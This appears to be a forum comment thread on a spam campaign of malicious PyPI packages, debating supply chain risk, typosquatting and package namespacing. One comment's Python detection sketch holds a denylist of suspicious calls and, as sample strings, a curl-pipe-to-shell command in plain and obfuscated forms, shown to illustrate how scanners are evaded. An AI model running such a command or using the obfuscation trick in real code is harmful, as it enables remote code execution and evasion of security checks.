It's not an attack "on" PyPI, or even an attack at all: someone is just spamming the index with packages. There's no evidence that these packages are being downloaded by anyone at all, or that the person in question has made any serious effort to conceal their intentions (it's all stuffed in the setup script without any obfuscation, as the post says). The executable in question isn't even served through PyPI (for reasons that are unclear to me): it's downloaded by the dropper script. Ironically, serving the binary directly would probably raise fewer red flags.
Supply chain security is important; we should reserve phrases like "aggressive attack" for things that aren't script kiddie spam.
Lol, maybe, "chatgpt, give me a thousand feasible pypi package names"?
And in this way, malicious packages may be unintentionally downloaded by users even when those packages did not yet exist when the LLM was trained, simply because the hallucinated package name was later registered by someone malicious.
I wrote a comment on the NPM thread earlier (https://news.ycombinator.com/threads?id=freeqaz) that I'll quote here:
> "While being flooded with spam is never good, it gets immediately noticed and mitigated. It's harder for open source projects to spot and stop rare one-offs"
This is the real problem that NPM and other ecosystems face. A determined attacker who is trying to "poison" a popular Open Source package just has to pose as a maintainer long enough to succeed[0]. Defeating these types of attacks will require rethinking how we approach trust in packages.
Projects like Deno are one approach (fork the ecosystem) while projects like Packj (mentioned elsewhere here), Socket.dev, and LunaTrace[1] are taking the other angle (make it harder to install malware).
It's hard to say which approach is better right away. (Probably a hybrid of both, realistically.) It's just non-trivial to fix this in one fell swoop. It's messy.
0: https://www.trendmicro.com/vinfo/us/security/news/cybercrime...
There's something beautiful in knowing you're using pure, clean Python. Much easier to install, also.
Attacking a popular repository like this does not have to have a high hit rate.
"Script kiddie spam" is now how computers get compromised. Unsophisticated mass attack.
This sort of thing, combined with woeful security and fragile systems, is causing havoc the world over.
It doesn't make plain Python code you blindly execute any safer, but at least you've explicitly given those packages your trust. I believe this is more geared toward detecting compromises of those packages you have given that trust.
Python used to have a "batteries included" philosophy which tried to put most important stuff into the distro, reducing the number of external dependencies any given app needed. They seem to have abandoned that now, leaving us to fend for ourselves against the malware.
NPM spam: https://www.scmagazine.com/analysis/devops/npm-repository-15...
Yes, along with reducing the stdlib and directing us to PyPI for "alternatives".
The closest thing is pattern/AST matching on the package's source, but trivial obfuscation defeats that. There's also no requirement that a package on PyPI is even uploaded with source (binary wheel-only packages are perfectly acceptable).
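To make that concrete, here's a minimal sketch of the kind of AST matching I mean, and how little it takes to slip past it. The denylist and the helper name `flag_suspicious_calls` are made up for illustration; this is not how any particular scanner works, just the general shape of the technique.

```python
import ast

# Hypothetical denylist for illustration; real scanners use far richer rules.
SUSPICIOUS_CALLS = {"exec", "eval", "urlopen", "system", "Popen"}


def flag_suspicious_calls(source: str) -> list[str]:
    """Return the denylisted function names that are called directly in `source`."""
    hits = []
    # ast.parse only parses the text; nothing in `source` is executed.
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            # Handle bare names (exec(...)) and attribute access (os.system(...)).
            if isinstance(func, ast.Name):
                name = func.id
            else:
                name = getattr(func, "attr", None)
            if name in SUSPICIOUS_CALLS:
                hits.append(name)
    return sorted(hits)


# The same payload written plainly and with trivial string-splitting obfuscation.
plain = "import os\nos.system('curl http://example.invalid/x | sh')\n"
obfuscated = (
    "import os\n"
    "getattr(os, 'sys' + 'tem')('curl http://example.invalid/x | sh')\n"
)

print(flag_suspicious_calls(plain))       # the direct call is flagged
print(flag_suspicious_calls(obfuscated))  # nothing is flagged
```

The second snippet does exactly the same thing at runtime, but the name `system` never appears as a call target in the tree, so a name-based matcher sees nothing.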
This is a little bit too strong, since packaging doesn't require arbitrary code execution. For example, Go doesn't permit arbitrary code execution during `go get`. Now - there have been bugs which permit code execution (like https://github.com/golang/go/issues/22125) but they are treated as security vulnerabilities and bugs.
Of course, you're right about Python.
Java's type system: ClassLoaders plus SecurityManager was impossible?
that's literally how Java applets worked, enforced through the type system
https://docstore.mik.ua/orelly/java-ent/security/ch03_01.htm
yes, SecurityManager was a poor implementation for many reasons, but it's definitely not "impossible" to sandbox downloaded code from the network while having it interact with other existing code, you can do it with typing alone
I worked on something like this a few years back. It went nowhere, but I still believe it would be doable and useful. The only trace I could find is https://wiki.python.org/moin/Testing%20Infrastructure, which contains almost no info...
Maven sorted this out 20 years ago
what's a bit sad is that the python packaging authority's survey from a few months ago seemed to be mostly interested in vision and mission statements
rather than building a functional set of tools
(This is not a reason not to add namespacing; just an observation that it's mostly irrelevant to contexts like this.)
example: the package named "aws" on pypi was created by some random guy and has been abandoned for years
if pypi/pip supported namespacing that would be info.randomdude.aws instead
and amazon's packages would be under com.amazon
not being able to namespace internal packages is another security issue that is substantially improved with proper namespacing
to be blunt: not supporting it at this point is reckless and irresponsible
(I note you're part of pypa!)
Maybe the list can be hosted on an internal server for other employees to reuse. Hosting all the packages internally is overkill. Trusting the world by default is overkill.
Now "pip install gooogle/package"
"Hey User, gooogle/package is not from a trusted namespace. Did you mean google/package which is similar and trusted? Or would you like to add gooogle to your local trust file?"
The lack of any kind of curated feed that only lists verified or popular packages is a tragedy. There should be a reasonable way of allowing clients to protect themselves from a typo.
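A rough sketch of what that client-side check could look like, assuming a hypothetical `namespace/package` requirement syntax (pip doesn't support this today) and a hypothetical local trust list. The function name, the list contents, and the similarity cutoff are all my own placeholders.

```python
import difflib

# Hypothetical contents of a local trust file; the namespaces are illustrative only.
TRUSTED_NAMESPACES = ["google", "amazon", "microsoft"]


def check_namespace(requirement, trusted=TRUSTED_NAMESPACES, cutoff=0.8):
    """Classify a 'namespace/package' requirement.

    Returns a (status, suggestion) tuple where status is one of
    'trusted', 'did_you_mean', or 'untrusted'.
    """
    namespace, _, package = requirement.partition("/")
    if namespace in trusted:
        return ("trusted", requirement)
    # Look for a trusted namespace that is a near miss of the one requested.
    close = difflib.get_close_matches(namespace, trusted, n=1, cutoff=cutoff)
    if close:
        return ("did_you_mean", f"{close[0]}/{package}")
    return ("untrusted", requirement)


for req in ("google/package", "gooogle/package", "randomdude/aws"):
    print(req, "->", check_namespace(req))
```

The near-miss case is where the client would stop and ask the "did you mean" question; the unknown case is where it would offer to add the namespace to the local trust file. Plain string similarity is a crude proxy for typosquatting, so treat the cutoff as something to tune rather than a recommendation.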
Good namespacing (e.g. in Go), in practice, provides critical context about the development/publication of a software package.
But deliver anything more streamlined and secure? Hell, no!
https://journals.plos.org/plosone/article?id=10.1371/journal...
It's like NYC's sidewalks. Compare pedestrian behavior at say SoHo (daylight) and say LES (nighttime). Amazingly enough, the partying and inebriated pedestrians at night all file politely in the correct bimodal L|R formation. During the day, it's a rather wild and somewhat uncivilized dynamic slalom formation. My theory: Fangs. The night creatures know someone potentially dangerous may be in their midst.
In these cases I frankly assume that they don't either.